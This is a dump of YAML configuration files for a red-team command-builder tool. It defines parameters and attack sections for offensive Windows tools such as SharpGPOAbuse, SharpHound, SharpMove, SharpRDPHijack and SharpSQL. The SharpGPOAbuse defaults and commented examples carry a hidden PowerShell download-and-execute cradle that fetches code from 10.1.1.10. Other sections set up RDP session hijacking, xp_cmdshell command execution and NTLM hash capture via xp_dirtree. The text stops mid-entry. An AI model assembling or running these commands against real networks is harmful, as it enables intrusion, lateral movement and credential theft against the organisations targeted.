vulnerable GPO. 35 | template: "--GPOName \"{0}\"" 36 | default: Vulnerable GPO 37 | optional: true 38 | 39 | - name: Scripts configuration 40 | type: label 41 | 42 | - name: ScriptName 43 | type: text 44 | description: Set the name of the new startup script. 45 | template: "--ScriptName {0}" 46 | default: StartupScript.bat 47 | optional: true 48 | - name: ScriptContents 49 | type: text 50 | description: Set the contents of the new startup script. 51 | template: "--ScriptContents \"{0}\"" 52 | default: if %username%== powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\" 53 | optional: true 54 | 55 | - name: Task configuration 56 | type: label 57 | 58 | - name: TaskName 59 | type: text 60 | description: Set the name of the new computer task. 61 | template: "--TaskName \"{0}\"" 62 | default: Update 63 | optional: true 64 | - name: Author 65 | type: text 66 | description: Set the author of the new task (use a DA account). 67 | template: "--Author {0}" 68 | default: Example\Admin 69 | optional: true 70 | - name: Command 71 | type: text 72 | description: Command to execute. 73 | template: "--Command \"{0}\"" 74 | default: cmd.exe 75 | optional: true 76 | - name: Arguments 77 | type: text 78 | description: Arguments passed to the command. 79 | template: "--Arguments \"{0}\"" 80 | default: /c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\" 81 | optional: true 82 | 83 | - name: TargetUsername 84 | type: text 85 | description: The user to target. The malicious task will run only on the specified user. Should be in the format \ 86 | template: "--TargetUsername {0}" 87 | default: Example\Admin 88 | optional: true 89 | - name: TargetUserSID 90 | type: text 91 | description: The targeted user's SID. 92 | template: "{0}" 93 | default: S-1-24 94 | optional: true 95 | - name: TargetDnsName 96 | type: text 97 | description: The DNS name of the computer to target. The malicious task will run only on the specified host. 98 | template: "--TargetDnsName {0}" 99 | default: target.example.local 100 | optional: true 101 | 102 | - name: Domain 103 | type: text 104 | description: Set the target domain 105 | template: "--Domain {0}" 106 | default: example.local 107 | optional: true 108 | - name: DomainController 109 | type: text 110 | description: Set the target domain controller 111 | template: "--DomainController {0}" 112 | default: dc1.example.local 113 | optional: true 114 | 115 | - name: Flags 116 | type: label 117 | 118 | - name: FilterEnabled 119 | type: flag 120 | description: Enable Target Filtering for computer immediate tasks. 121 | value: "--FilterEnabled" 122 | optional: true 123 | selected: false 124 | - name: Force 125 | type: flag 126 | description: Overwrite existing files if required 127 | value: "--Force" 128 | optional: true 129 | selected: false 130 | 131 | sections: 132 | - name: Self crafted command 133 | labels: ["Lateral"] 134 | mitre: '' 135 | verb: '' 136 | required_flags: [AttackType] 137 | optional_flags: [UserRights, UserAccount, GPOName, ScriptName, ScriptContents, TaskName, Author, Command, Arguments, FilterEnabled, TargetUsername, TargetUserSID, TargetDnsName] 138 | 139 | - name: Adding User Rights 140 | labels: ["Lateral", "Creds"] 141 | mitre: '' 142 | verb: '--AddUserRights' 143 | required_flags: [UserRights, UserAccount, GPOName] 144 | optional_flags: [] 145 | 146 | - name: Adding a Local Admin 147 | labels: ["Lateral", "Creds"] 148 | mitre: '' 149 | verb: '--AddLocalAdmin' 150 | required_flags: [UserAccount, GPOName] 151 | optional_flags: [] 152 | 153 | - name: Configuring a User or Computer Logon Script 154 | labels: ["Lateral", "Creds"] 155 | mitre: '' 156 | verb: '--AddUserScript' 157 | required_flags: [ScriptName, ScriptContents, GPOName] 158 | optional_flags: [] 159 | 160 | - name: Configuring a Computer or User Immediate Task 161 | labels: ["Lateral", "Creds"] 162 | mitre: '' 163 | verb: '--AddComputerTask' 164 | required_flags: [TaskName, Author, Command, Arguments, GPOName, FilterEnabled, TargetDnsName] 165 | optional_flags: [] 166 | 167 | 168 | 169 | # - name: Configuring a User or Computer Logon Script 170 | 171 | # commands: 172 | # - language: EXE 173 | # command: SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "{{GPOName}}" 174 | 175 | # - name: Configuring a User or Computer Logon Script, specific user or computer 176 | # labels: ["Lateral", "Creds"] 177 | # commands: 178 | # - language: EXE 179 | # command: SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "" --GPOName "{{GPOName}}" 180 | 181 | # - name: Configuring a Computer or User Immediate Task 182 | # labels: ["Lateral", "Creds"] 183 | # commands: 184 | # - language: EXE 185 | # command: SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "{{GPOName}}" 186 | 187 | # - name: Configuring a Computer or User Immediate Task, specific user or computer 188 | # labels: ["Lateral", "Creds"] 189 | # commands: 190 | # - language: EXE 191 | # command: SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com 192 | -------------------------------------------------------------------------------- /commands/SharpHound.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: 3 | sigmaRulesURL: https://raw.githubusercontent.com/SigmaHQ/sigma/master/rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml 4 | # https://github.com/SigmaHQ/sigma/raw/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml 5 | name: SharpHound 6 | languages: 7 | - name: EXE 8 | prefix: SharpHound.exe 9 | - name: Apollo 10 | prefix: inline_assembly -Assembly "SharpHound" -Arguments " 11 | 12 | params: 13 | - name: CollectionMethod 14 | description: Specify collection method for BH. 15 | default: "All" 16 | template: "-c {0}" 17 | type: select 18 | options: ["Default", "All", "DCOnly", "ComputerOnly", "Session", "LoggedOn", "Group", "ACL", "GPOLocalGroup", "Trusts", "Container", "LocalGroup", "LocalAdmin", "RDP", "DCOM", "PSRemote", "ObjectProps"] 19 | optional: false 20 | - name: Domain 21 | type: text 22 | description: Name of the domain to enumerate 23 | template: "-d {0}" 24 | default: example.local 25 | optional: false 26 | 27 | - name: Search Filters 28 | type: label 29 | 30 | - name: LDAPFilter 31 | template: "-f \"{0}\"" 32 | description: Add an LDAP filter to the pregenerated filter. 33 | type: text 34 | default: (CN=*,OU=Example,DC=Example,DC=Local) 35 | optional: true 36 | 37 | - name: DistinguishedName 38 | type: text 39 | description: Base DistinguishedName to start search at. 40 | template: "--distinguishedname \"{0}\"" 41 | default: OU=Example,DC=Example,DC=Local 42 | optional: true 43 | 44 | - name: Input Output 45 | type: label 46 | 47 | - name: ComputerFile 48 | type: text 49 | description: Path to file containing computer names to enumerate 50 | template: "--computerfile \"{0}\"" 51 | default: file.txt 52 | optional: true 53 | - name: OutputDirectory 54 | type: text 55 | description: Directory to output file too 56 | template: "--outputdirectory \"{0}\"" 57 | default: "." 58 | optional: true 59 | - name: OutputPrefix 60 | type: text 61 | description: String to prepend to output file names 62 | template: "--outputprefix {0}" 63 | default: prefix 64 | optional: true 65 | - name: CacheName 66 | type: text 67 | description: Filename for cache (Defaults to a machine specific identifier) 68 | template: "--cachename {0}" 69 | default: cache 70 | optional: true 71 | - name: ZipFileName 72 | type: text 73 | description: Filename for the zip 74 | template: "--zipfilename {0}" 75 | default: ZipName 76 | optional: true 77 | - name: ZipPassword 78 | type: text 79 | description: Password protects the zip with the specified password 80 | template: "--zippassword {0}" 81 | default: Z!pP4ssw0rd@ 82 | optional: true 83 | 84 | - name: Authentication 85 | type: label 86 | 87 | - name: Username 88 | description: Username for LDAP 89 | type: text 90 | default: user1 91 | template: "--ldapusername {0}" 92 | optional: true 93 | - name: Password 94 | description: Password for LDAP 95 | type: text 96 | template: "--ldappassword {0}" 97 | default: P@ssw0rd 98 | optional: true 99 | selected: false 100 | 101 | - name: LDAP config 102 | type: label 103 | 104 | - name: DomainController 105 | type: text 106 | description: Override domain controller to pull LDAP from. This option can result in data loss 107 | template: "--domaincontroller {0}" 108 | default: dc1 109 | optional: true 110 | - name: LDAPPort 111 | type: text 112 | description: Override port for LDAP 113 | template: "--ldapport {0}" 114 | default: 0 115 | optional: true 116 | 117 | - name: Scanning config 118 | type: label 119 | 120 | - name: PortCheckTimeout 121 | type: text 122 | description: Timeout for port checks in milliseconds 123 | template: "--portchecktimeout {0}" 124 | default: 500 125 | optional: true 126 | - name: Throttle 127 | type: text 128 | description: Add a delay after computer requests in milliseconds. 129 | template: "--throttle {0}" 130 | default: 0 131 | optional: true 132 | - name: Jitter 133 | type: text 134 | description: Add jitter to throttle (percent) 135 | template: "--jitter {0}" 136 | default: 0 137 | optional: true 138 | - name: Threads 139 | type: text 140 | description: Number of threads to run enumeration with. 141 | template: "--threads {0}" 142 | default: 50 143 | optional: true 144 | 145 | - name: Loop Config 146 | type: label 147 | 148 | - name: LoopDuration 149 | type: text 150 | description: Loop duration (Defaults to 2 hours - 00:02:00) 151 | template: "--loopduration {0}" 152 | default: 00:02:00 153 | optional: true 154 | - name: LoopInterval 155 | type: text 156 | description: Add delay between loops (Example - 00:00:01 is 1 minute) 157 | template: "--loopinterval {0}" 158 | default: 00:00:01 159 | optional: true 160 | - name: StatusInterval 161 | type: text 162 | description: Interval in which to display status in milliseconds. 163 | template: "--statusinterval {0}" 164 | default: 30000 165 | optional: true 166 | 167 | 168 | - name: Flags 169 | type: label 170 | 171 | - name: SearchForest 172 | type: flag 173 | description: Search all available domains in the forest 174 | value: "-s" 175 | optional: true 176 | selected: false 177 | - name: Stealth 178 | type: flag 179 | description: Perform “stealth” data collection 180 | value: "--stealth" 181 | optional: true 182 | selected: true 183 | - name: MemCache 184 | type: flag 185 | description: Keep cache in memory and don't write to disk 186 | value: "--memcache" 187 | optional: true 188 | selected: false 189 | - name: RebuildCache 190 | type: flag 191 | description: Rebuild cache and remove all entries 192 | value: "--rebuildcache" 193 | optional: true 194 | selected: false 195 | - name: RandomFileNames 196 | type: flag 197 | description: Use random filenames for output 198 | value: "--randomfilenames" 199 | optional: true 200 | selected: false 201 | - name: NoZip 202 | type: flag 203 | description: Don't zip files 204 | value: "--nozip" 205 | optional: true 206 | selected: false 207 | - name: TrackComputerCalls 208 | type: flag 209 | description: Adds a CSV tracking requests to computers 210 | value: "--trackcomputercalls" 211 | optional: true 212 | selected: false 213 | - name: PrettyPrint 214 | type: flag 215 | description: Pretty print JSON 216 | value: "--prettyprint" 217 | optional: true 218 | selected: false 219 | - name: LDAPS 220 | type: flag 221 | description: This will use ldaps 222 | value: "--secureldap" 223 | optional: true 224 | selected: true 225 | - name: DisableCertVerification 226 | type: flag 227 | description: Disable certificate verification for secure LDAP 228 | value: "--disablecertverification" 229 | optional: true 230 | selected: false 231 | - name: DisableSigning 232 | type: flag 233 | description: Disables Kerberos Signing/Sealing 234 | value: "--disablesigning" 235 | optional: true 236 | selected: false 237 | - name: SkipPortCheck 238 | type: flag 239 | description: Skip checking if 445 is open 240 | value: "--skipportcheck" 241 | optional: true 242 | selected: false 243 | - name: SkipPasswordCheck 244 | type: flag 245 | description: Skip PwdLastSet age check when checking computers 246 | value: "--skippasswordcheck" 247 | optional: true 248 | selected: false 249 | - name: ExcludeDC 250 | type: flag 251 | description: Exclude domain controllers from session/localgroup enumeration (mostly for ATA/ATP) 252 | value: "--excludedcs" 253 | optional: true 254 | selected: false 255 | - name: Loop 256 | type: flag 257 | description: Loop computer collection 258 | value: "-l" 259 | optional: true 260 | selected: false 261 | 262 | 263 | 264 | sections: 265 | - name: Collect 266 | labels: ["Recon", "LDAP"] 267 | mitre: "T1590.001" 268 | verb: '' 269 | required_flags: [CollectionMethod, Domain] 270 | optional_flags: [ 271 | LDAPFilter, 272 | DistinguishedName, 273 | ComputerFile, 274 | OutputDirectory, 275 | OutputPrefix, 276 | CacheName, 277 | ZipFileName, 278 | ZipPassword, 279 | Username, 280 | Password, 281 | DomainController, 282 | LDAPPort, 283 | PortCheckTimeout, 284 | Throttle, 285 | Jitter, 286 | Threads, 287 | LoopDuration, 288 | LoopInterval, 289 | StatusInterval, 290 | SearchForest, 291 | Stealth, 292 | MemCache, 293 | RebuildCache, 294 | RandomFileNames, 295 | NoZip, 296 | TrackComputerCalls, 297 | PrettyPrint, 298 | LDAPS, 299 | DisableCertVerification, 300 | DisableSigning, 301 | SkipPortCheck, 302 | SkipPasswordCheck, 303 | ExcludeDC, 304 | Loop 305 | ] -------------------------------------------------------------------------------- /commands/SharpMove.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/0xthirteen/SharpMove 3 | name: SharpMove 4 | languages: 5 | - name: EXE 6 | prefix: SharpMove.exe 7 | 8 | params: 9 | - name: action 10 | description: Action to execute 11 | default: query 12 | template: "action={0}" 13 | type: select 14 | options: [query, create, executevbs, taskscheduler, dcom, scm, modsvc, modschtask, hijackdcom, startservice] 15 | optional: false 16 | - name: ComputerName 17 | type: text 18 | description: desc 19 | template: "computername={0}" 20 | default: Comp1.windomain.local 21 | optional: false 22 | 23 | - name: Command 24 | type: text 25 | description: Command to execute 26 | template: "command=\"{0}\"" 27 | default: C:\windows\temp\payload.exe 28 | optional: true 29 | - name: Query 30 | type: text 31 | description: WMI query 32 | template: "query=\"{0}\"" 33 | default: select * from win32_process 34 | optional: true 35 | - name: ServiceName 36 | type: text 37 | description: Service name 38 | template: "servicename={0}" 39 | default: TestService 40 | optional: true 41 | - name: CLSID 42 | type: text 43 | description: CLSID 44 | template: "clsid={0}" 45 | default: "{40bdc4e5-d532-42e6-b667-1ab890fdebcf}" 46 | optional: true 47 | - name: TaskName 48 | type: text 49 | description: Task name 50 | template: "taskname={0}" 51 | default: TestTask 52 | optional: true 53 | - name: Method 54 | type: text 55 | description: Method 56 | template: "method={0}" 57 | default: ShellBrowserWindow 58 | optional: true 59 | - name: EventName 60 | type: text 61 | description: Event name 62 | template: "eventname={0}" 63 | default: Debug 64 | optional: true 65 | 66 | - name: Authentication 67 | type: label 68 | 69 | - name: Domain 70 | type: text 71 | description: desc 72 | template: "{0}" 73 | default: 74 | optional: false 75 | - name: Username 76 | type: text 77 | description: Username 78 | template: "username={Domain}\\{0}" 79 | default: User1 80 | optional: true 81 | - name: Password 82 | type: text 83 | description: Password 84 | template: "password={0}" 85 | default: Password123 86 | optional: true 87 | 88 | - name: Flags 89 | type: label 90 | 91 | - name: AMSI 92 | type: flag 93 | description: desc 94 | value: "amsi=true" 95 | optional: true 96 | selected: false 97 | 98 | sections: 99 | - name: Self crafted command 100 | labels: [] 101 | mitre: '' 102 | verb: '' 103 | required_flags: [action, ComputerName] 104 | optional_flags: [Command, Query, ServiceName, CLSID, TaskName, Method, EventName, Username, Password, AMSI] 105 | - name: Query WMI 106 | labels: ["Recon", "Creds", "WMI"] 107 | mitre: '' 108 | verb: 'action=query' 109 | required_flags: [ComputerName, Query, Username, Password] 110 | optional_flags: [] 111 | - name: Execute WMI 112 | labels: ["Lateral", "Creds", "WMI"] 113 | mitre: '' 114 | verb: 'action=create' 115 | required_flags: [ComputerName, Command, Username, Password, AMSI] 116 | optional_flags: [] 117 | - name: Execute VBS 118 | labels: ["Lateral", "Creds", "VBS"] 119 | mitre: '' 120 | verb: 'action=executevbs' 121 | required_flags: [ComputerName, EventName, Username, Password, AMSI] 122 | optional_flags: [] 123 | - name: Execute task over TaskScheduler 124 | labels: ["Lateral", "Creds"] 125 | mitre: '' 126 | verb: 'action=taskscheduler' 127 | required_flags: [ComputerName, Command, TaskName, Username, Password, AMSI] 128 | optional_flags: [] 129 | - name: Execute task over DCOM 130 | labels: ["Lateral", "Creds", "DCOM"] 131 | mitre: '' 132 | verb: 'action=dcom' 133 | required_flags: [ComputerName, Command, Method, AMSI] 134 | optional_flags: [] 135 | - name: Execute task over SCM 136 | labels: ["Lateral", "Creds", "SCM"] 137 | mitre: '' 138 | verb: 'action=scm' 139 | required_flags: [ComputerName, Command, ServiceName, AMSI] 140 | optional_flags: [] 141 | - name: Execute task over modsvc 142 | labels: ["Lateral", "Creds"] 143 | mitre: '' 144 | verb: 'action=modsvc' 145 | required_flags: [ComputerName, Command, ServiceName, AMSI] 146 | optional_flags: [] 147 | - name: Execute task over modschtask 148 | labels: ["Lateral", "Creds"] 149 | mitre: '' 150 | verb: 'action=modschtask' 151 | required_flags: [ComputerName, Command, Username, Password, TaskName] 152 | optional_flags: [] 153 | - name: Execute task using hijackdcom 154 | labels: ["Lateral", "Creds"] 155 | mitre: '' 156 | verb: 'action=hijackdcom' 157 | required_flags: [ComputerName, CLSID] 158 | optional_flags: [] 159 | - name: Execute task using start service 160 | labels: ["Lateral", "Creds"] 161 | mitre: '' 162 | verb: 'action=startservice' 163 | required_flags: [ComputerName, ServiceName] 164 | optional_flags: [] 165 | -------------------------------------------------------------------------------- /commands/SharpRDP.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Sygnia/SharpRDP 3 | name: SharpRDP 4 | languages: 5 | - name: EXE 6 | prefix: SharpRDP.exe 7 | 8 | params: 9 | - name: ComputerName 10 | type: text 11 | description: Target computer name 12 | template: "computername={0}" 13 | default: Comp1.windomain.local 14 | optional: false 15 | - name: Command 16 | type: text 17 | description: Command to execute 18 | template: "command=\"{0}\"" 19 | default: C:\temp\file.exe 20 | optional: false 21 | - name: Username 22 | type: text 23 | description: Username 24 | template: "username={0}" 25 | default: User1 26 | optional: true 27 | - name: Password 28 | type: text 29 | description: User password 30 | template: "password={0}" 31 | default: Password123 32 | optional: true 33 | - name: Exec 34 | type: text 35 | description: Parent process to execute 36 | template: "{0}" 37 | default: cmd 38 | optional: true 39 | - name: Elevated 40 | description: Execute elevated command using one of the following options 41 | default: taskmgr 42 | template: "elevated={0}" 43 | type: select 44 | options: [taskmgr, winr] 45 | optional: true 46 | 47 | - name: NLA 48 | type: flag 49 | description: Network Level Authentication 50 | value: nla=true 51 | optional: true 52 | selected: false 53 | - name: Takeover 54 | type: flag 55 | description: Should takeover session 56 | value: takeover=true 57 | optional: true 58 | selected: false 59 | - name: ConnectDrive 60 | type: flag 61 | description: Should connect drive 62 | value: connectdrive=true 63 | optional: true 64 | selected: false 65 | 66 | sections: 67 | - name: Self crafted command 68 | labels: ["Lateral", "RDP"] 69 | mitre: '' 70 | verb: '' 71 | required_flags: [ComputerName, Command] 72 | optional_flags: [Username, Password, Exec, ConnectDrive, Elevated, NLA, Takeover] 73 | 74 | - name: Regular RDP connection and execution 75 | labels: ["Lateral", "RDP"] 76 | mitre: '' 77 | verb: '' 78 | required_flags: [ComputerName, Command, Username, Password] 79 | optional_flags: [] 80 | 81 | - name: Exec program as child process of cmd or powershell 82 | labels: ["Lateral", "RDP"] 83 | mitre: '' 84 | verb: '' 85 | required_flags: [ComputerName, Command, Username, Password, Exec] 86 | optional_flags: [] 87 | 88 | - name: Use restricted admin mode 89 | labels: ["Lateral", "RDP"] 90 | mitre: '' 91 | verb: '' 92 | required_flags: [ComputerName, Command] 93 | optional_flags: [] 94 | 95 | - name: Connect first host drives 96 | labels: ["Lateral", "RDP"] 97 | mitre: '' 98 | verb: '' 99 | required_flags: [ComputerName, Command, Username, Password, ConnectDrive] 100 | optional_flags: [] 101 | 102 | - name: Execute command elevated 103 | labels: ["Lateral", "RDP"] 104 | mitre: '' 105 | verb: '' 106 | required_flags: [ComputerName, Command, Username, Password, Elevated] 107 | optional_flags: [] 108 | 109 | - name: Add Network Level Authentication 110 | labels: ["Lateral", "RDP"] 111 | mitre: '' 112 | verb: '' 113 | required_flags: [ComputerName, Command, Username, Password, NLA] 114 | optional_flags: [] 115 | 116 | - name: Ask to take over logon session 117 | labels: ["Lateral", "RDP"] 118 | mitre: '' 119 | verb: '' 120 | required_flags: [ComputerName, Command, Username, Password, Takeover] 121 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpRDPHijack.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/bohops/SharpRDPHijack 3 | name: SharpRDPHijack 4 | languages: 5 | - name: EXE 6 | prefix: SharpRDPHijack.exe 7 | 8 | params: 9 | - name: Host 10 | type: text 11 | description: Query a host to identify RDP/TS session information (not required for other switches) 12 | template: "--tsquery={0}" 13 | default: localhost 14 | optional: true 15 | - name: Session 16 | type: text 17 | description: Target session identifier 18 | template: "--session={0}" 19 | default: 1 20 | optional: true 21 | - name: Password 22 | type: text 23 | description: Session password if known (otherwise optional - not required for disconnect switch) 24 | template: "--password={0}" 25 | default: Password123 26 | optional: true 27 | 28 | - name: Console 29 | type: flag 30 | description: Redirect session to console session instead of current (active) session 31 | value: --console 32 | optional: true 33 | selected: false 34 | - name: Disconnect 35 | type: flag 36 | description: Disconnect an active (remote) session 37 | value: --disconnect 38 | optional: true 39 | selected: false 40 | 41 | sections: 42 | - name: Self created RDP Hijack command 43 | labels: ["Lateral"] 44 | mitre: '' 45 | verb: '' 46 | required_flags: [] 47 | optional_flags: [Host, Session, Password, Console, Disconnect] 48 | - name: Query the local host for RDP/TS session information 49 | labels: ["Lateral"] 50 | mitre: '' 51 | verb: '' 52 | required_flags: [Host] 53 | optional_flags: [] 54 | - name: Impersonate NT AUTHORITY\SYSTEM to hijack session and redirect to the current session 55 | labels: ["Lateral"] 56 | mitre: '' 57 | verb: '' 58 | required_flags: [Session] 59 | optional_flags: [] 60 | - name: Impersonate NT AUTHORITY\SYSTEM to hijack session and redirect to the console session 61 | labels: ["Lateral"] 62 | mitre: '' 63 | verb: '' 64 | required_flags: [Session, Console] 65 | optional_flags: [] 66 | - name: Hijack Remote Desktop session with knowledge of the logged-on user's password 67 | labels: ["Lateral"] 68 | mitre: '' 69 | verb: '' 70 | required_flags: [Session, Password] 71 | optional_flags: [] 72 | - name: Disconnect active session 73 | labels: ["Lateral"] 74 | mitre: '' 75 | verb: '' 76 | required_flags: [Session, Disconnect] 77 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpSCCM.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Mayyhem/SharpSCCM 3 | name: SharpSCCM 4 | params: 5 | 6 | sections: 7 | - name: name 8 | labels: [] 9 | mitre: '' 10 | commands: 11 | - language: EXE 12 | command: some 13 | -------------------------------------------------------------------------------- /commands/SharpSQL.yaml: -------------------------------------------------------------------------------- 1 | projectLink: https://github.com/mlcsec/SharpSQL 2 | name: SharpSQL 3 | languages: 4 | - name: EXE 5 | prefix: 'SharpSQL.exe' 6 | - name: Apollo 7 | prefix: inline_assembly -Assembly "SharpSQL.exe" -Arguments " 8 | 9 | params: 10 | - name: Target 11 | type: label 12 | 13 | - name: Instance 14 | type: text 15 | description: The targeted SQL server instance 16 | template: "-Instance {0}" 17 | default: sql.server 18 | optional: false 19 | 20 | - name: Database 21 | type: text 22 | description: The db to connect to (default - master) 23 | template: "-db {0}" 24 | optional: true 25 | 26 | - name: LinkedInstance 27 | type: text 28 | description: The linked instance to target 29 | template: "-LinkedInstance {0}" 30 | default: linked.sql.server 31 | optional: true 32 | 33 | - name: Username 34 | type: text 35 | description: The SQL user to impersonate 36 | template: "-User {0}" 37 | optional: true 38 | 39 | - name: Execute 40 | type: label 41 | 42 | - name: Command 43 | type: text 44 | description: The command to execute 45 | template: "-Command {0}" 46 | default: "whoami && ipconfig" 47 | optional: true 48 | 49 | - name: Query 50 | type: text 51 | description: The raw SQL query to execute 52 | template: "-Query {0}" 53 | optional: true 54 | 55 | - name: Option for Get-Hash 56 | type: label 57 | 58 | - name: ListenerAddress # Get-Hash 59 | type: text 60 | description: The IP to xp_dirtree (share - /pwn) 61 | template: "-ip {0}" 62 | default: '' 63 | optional: true 64 | 65 | 66 | - name: Self-craft 67 | type: label 68 | 69 | - name: Method 70 | type: select 71 | description: Select a method for self crafted command 72 | template: "{0}" 73 | optional: false 74 | default: 'Get-DBUser' 75 | options: [ 76 | #Get-SQLInstanceDomain, 77 | Get-Databases, 78 | Get-DBUser, 79 | Get-GroupMembership, 80 | Get-Hash, 81 | Get-ImpersonableUsers, 82 | Get-LinkedServers, 83 | Get-LinkedPrivs, 84 | Get-Sysadmins, 85 | Get-SystemUser, 86 | Get-SQLQuery, 87 | Get-Triggers, 88 | Get-Users, 89 | Get-UserPrivs, 90 | Check-Cmdshell, 91 | Check-LinkedCmdshell, 92 | Clear-CLRAsm, 93 | Enable-Cmdshell, 94 | Enable-LinkedCmdshell, 95 | Invoke-OSCmd, 96 | Invoke-LinkedOSCmd, 97 | Invoke-ExternalScript, 98 | Invoke-OLEObject, 99 | Invoke-CLRAsm, 100 | Invoke-UserImpersonation, 101 | Invoke-DBOImpersonation 102 | ] 103 | 104 | 105 | sections: 106 | - name: Get SQL instances within current domain via user and computer SPNs 107 | labels: [Recon,SQL] 108 | mitre: '' 109 | verb: 'Get-SQLInstanceDomain' 110 | required_flags: [] 111 | optional_flags: [] 112 | 113 | - name: Get the Windows User/Machine hash via xp_dirtree. Make sure to set-up a listener (e.g ntlmrelayx, Inveigh). 114 | labels: [Credential Access,SQL] 115 | mitre: '' 116 | verb: 'Get-Hash' 117 | required_flags: [Instance, ListenerAddress] 118 | optional_flags: [Database, LinkedInstance, Username] 119 | 120 | - name: Get the privileges of the current user context 121 | labels: [Recon,SQL] 122 | mitre: '' 123 | verb: 'Get-UserPrivs' 124 | required_flags: [Instance] 125 | optional_flags: [Database, LinkedInstance, Username] 126 | 127 | - name: Get linked SQL servers 128 | labels: [Recon,SQL] 129 | mitre: '' 130 | verb: 'Get-LinkedServers' 131 | required_flags: [Instance] 132 | optional_flags: [] 133 | 134 | - name: Get sysadmin users 135 | labels: [Recon,SQL] 136 | mitre: '' 137 | verb: 'Get-Sysadmins' 138 | required_flags: [Instance] 139 | optional_flags: [] 140 | 141 | - name: Enable xp_cmdshell on instance 142 | labels: [Exec, SQL, xp_cmdshell] 143 | mitre: '' 144 | verb: 'Enable-Cmdshell' 145 | required_flags: [Instance] 146 | optional_flags: [] 147 | 148 | - name: Invoke OS command 149 | labels: [Exec, SQL, xp_cmdshell] 150 | mitre: '' 151 | verb: 'Invoke-OSCmd' 152 | required_flags: [Instance, Command] 153 | optional_flags: [] 154 | 155 | - name: Invoke command execution via impersonation 156 | labels: [Exec, SQL, xp_cmdshell] 157 | mitre: '' 158 | verb: 'Invoke-UserImpersonation' 159 | required_flags: [Instance, Username, Query] 160 | optional_flags: [] 161 | 162 | - name: Self-craft command 163 | labels: [SQL, xp_cmdshell] 164 | mitre: '' 165 | verb: '' 166 | required_flags: [Method, Instance] 167 | optional_flags: [Database, LinkedInstance, Username, Command, Query] -------------------------------------------------------------------------------- /commands/SharpShares.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/mitchmoser/SharpShares 3 | name: SharpShares 4 | languages: 5 | - name: EXE 6 | prefix: SharpShares.exe 7 | 8 | params: 9 | - name: Threads 10 | type: text 11 | description: specify maximum number of parallel threads 12 | template: "/threads:{0}" 13 | default: 25 14 | optional: true 15 | - name: DomainController 16 | type: text 17 | description: specify domain controller to query (if not ran on a domain-joined host) 18 | template: "/dc:{0}" 19 | default: dc1 20 | optional: true 21 | - name: Domain 22 | type: text 23 | description: specify domain name (if not ran on a domain-joined host) 24 | template: "/domain:{0}" 25 | default: windomain.local 26 | optional: true 27 | - name: SsLDAP 28 | description: query hosts from the following LDAP filters 29 | default: all 30 | template: "/ldap:{0}" 31 | type: select 32 | options: ["all", "dc", "exclude-dc", "servers", "servers-exclude-dc"] 33 | optional: true 34 | - name: OU 35 | type: text 36 | description: specify LDAP OU to query enabled computer objects from 37 | template: "/ou:\"{0}\"" 38 | default: OU=Special Servers,DC=windomain,DC=local 39 | optional: true 40 | - name: Fiter 41 | type: text 42 | description: list of comma-separated shares to exclude from enumeration 43 | template: "/filter:{0}" 44 | default: SYSVOL,NETLOGON,IPC$,PRINT$ 45 | optional: true 46 | - name: OutFile 47 | type: text 48 | description: specify file for shares to be appended to instead of printing to std out 49 | template: "/outfile:{0}" 50 | default: C:\temp\outfile 51 | optional: true 52 | 53 | - name: Stealth 54 | type: flag 55 | description: list share names without performing read/write access checks 56 | value: /stealth 57 | optional: true 58 | selected: true 59 | - name: Verbose 60 | type: flag 61 | description: return unauthorized shares 62 | value: /verbose 63 | optional: true 64 | selected: true 65 | 66 | 67 | sections: 68 | - name: Execute shares search custom 69 | labels: ["Recon"] 70 | mitre: 'T1083' 71 | verb: '' 72 | required_flags: [] 73 | optional_flags: [Threads, DomainController, Domain, SsLDAP, OU, Filter, OutFile, Stealth, Verbose] 74 | - name: Verbose search shares with custom filter, threads, ldap, ou 75 | labels: ["Recon"] 76 | mitre: 'T1083' 77 | verb: '' 78 | required_flags: [Threads, SsLDAP, OU, Filter, Verbose] 79 | optional_flags: [] 80 | - name: Verbose search shares, output results to file 81 | labels: ["Recon"] 82 | mitre: 'T1083' 83 | verb: '' 84 | required_flags: [Threads, SsLDAP, OU, Filter, Verbose, OutFile] 85 | optional_flags: [] 86 | - name: Stealth and verbose search shares, output results to file 87 | labels: ["Recon"] 88 | mitre: 'T1083' 89 | verb: '' 90 | required_flags: [Threads, SsLDAP, OU, Filter, OutFile, Verbose, Stealth] 91 | optional_flags: [] 92 | -------------------------------------------------------------------------------- /commands/SharpSniper.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/HunnicCyber/SharpSniper 3 | name: SharpSniper 4 | languages: 5 | - name: EXE 6 | prefix: SharpSniper.exe 7 | 8 | params: 9 | - name: SearchUser 10 | type: text 11 | description: User to search 12 | template: "{0}" 13 | default: targetuser 14 | optional: false 15 | - name: Username 16 | type: text 17 | description: Domain user Username 18 | template: "{0}" 19 | default: User1 20 | optional: false 21 | - name: Password 22 | type: text 23 | 